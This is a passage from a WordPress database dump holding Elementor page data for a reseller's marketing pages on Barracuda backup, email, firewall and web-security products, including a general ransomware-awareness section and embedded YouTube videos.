Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.<\\/p><p>If you\\u2019re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f39b5e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4141c34\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae09c83\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Powerful Reporting and Statistics<\\/h2><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.<\\/p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4781,2803,'_wp_page_template','template-fullwidth.php'),(4782,2803,'_elementor_edit_mode','builder'),(4767,2801,'_wp_page_template','template-fullwidth.php'),(4768,2801,'_elementor_edit_mode','builder'),(4769,2801,'_elementor_template_type','post'),(4770,2801,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Barracuda\'s wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88b8d39\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd1c255\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6836eeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b63daf0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"75c5bf3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d09a4e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"870e39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"75a3ce3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0d8ae3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"29da3a42\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14e1924c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6814ee08\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Filters Content, Malware, Social Media and Rogue App Threats<\\/h3>\\r\\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\\r\\n\\r\\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\\r\\n<h3>Enforce Corporate Policies<\\/h3>\\r\\n<img class=\\\"alignnone wp-image-2408\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ENFORCE-CORPORATE-POLICIES.png\\\" alt=\\\"\\\" width=\\\"268\\\" height=\\\"244\\\" \\/>\\r\\n\\r\\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\\r\\n<h3>Protect Against Web-Based Threats<\\/h3>\\r\\n<img class=\\\"alignnone wp-image-2409\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Protect-Against-Web-Based-Threats.png\\\" alt=\\\"\\\" width=\\\"326\\\" height=\\\"179\\\" \\/>\\r\\n\\r\\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\\r\\n<h3>Monitor Network and User Activity<\\/h3>\\r\\n<img class=\\\"alignnone wp-image-2407\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/MONITOR-NETWORK-AND-USER-ACTIVITY.png\\\" alt=\\\"\\\" width=\\\"283\\\" height=\\\"230\\\" \\/>\\r\\n\\r\\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\\r\\n\\r\\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\\r\\n\\r\\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\\r\\n<h3>Secure Laptops and Mobile Devices<\\/h3>\\r\\n<img class=\\\"alignnone wp-image-2410\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png\\\" alt=\\\"\\\" width=\\\"291\\\" height=\\\"227\\\" \\/>\\r\\n\\r\\nExtend security and policies to remote users.\\u00a0 With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\\r\\n<h3>Simplify Management<\\/h3>\\r\\n<img class=\\\"alignnone wp-image-2411\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/SIMPLIFY-MANAGEMENT.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"237\\\" \\/>\\r\\n\\r\\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\\r\\n\\r\\n<img class=\\\"categoryImage dataImage\\\" src=\\\"https:\\/\\/www.barracuda.com\\/assets\\/images\\/common\\/data_protection.svg\\\" alt=\\\"Barracuda Data Protection Icon\\\" width=\\\"21\\\" height=\\\"24\\\" \\/>\\u00a0 <strong>Data Protection<\\/strong>\\r\\n\\r\\nBarracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.\\r\\n\\r\\nTo discover more, please click the button below or contact us to discuss your needs.\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5008,2851,'_wp_attached_file','2019/02/Evolve.jpg'),(4772,1445,'_elementor_version','2.5.14'),(4788,1445,'_oembed_2d29671a5983272b19db204a5686ae56','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/ds9fjUyPyoY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(4789,1445,'_oembed_time_2d29671a5983272b19db204a5686ae56','1546572502'),(4790,1445,'_oembed_cfc6a89e4415eaf58ef7a21d5f216bd5','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/HuMxGXS6IxE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(4791,1445,'_oembed_time_cfc6a89e4415eaf58ef7a21d5f216bd5','1546572502'),(4792,2804,'_wp_page_template','template-fullwidth.php'),(4793,2804,'_elementor_edit_mode','builder'),(4794,2804,'_elementor_template_type','post'),(4795,2804,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h3>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Understanding Ransomware<br \\/>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><p>47% of businesses have been affected by ransomware.<br \\/>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<br \\/>59% of ransomware infections are delivered via email attachments and embedded URLs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(4796,2804,'_elementor_version','0.4'),(4799,2805,'_wp_page_template','template-fullwidth.php'),(4800,2805,'_elementor_edit_mode','builder'),(4801,2805,'_elementor_template_type','post'),(4802,2805,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h3>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Understanding Ransomware<br \\/>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><ul><li>47% of businesses have been affected by ransomware.<\\/li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<\\/li><li>59% of ransomware infections are delivered via email attachments and embedded 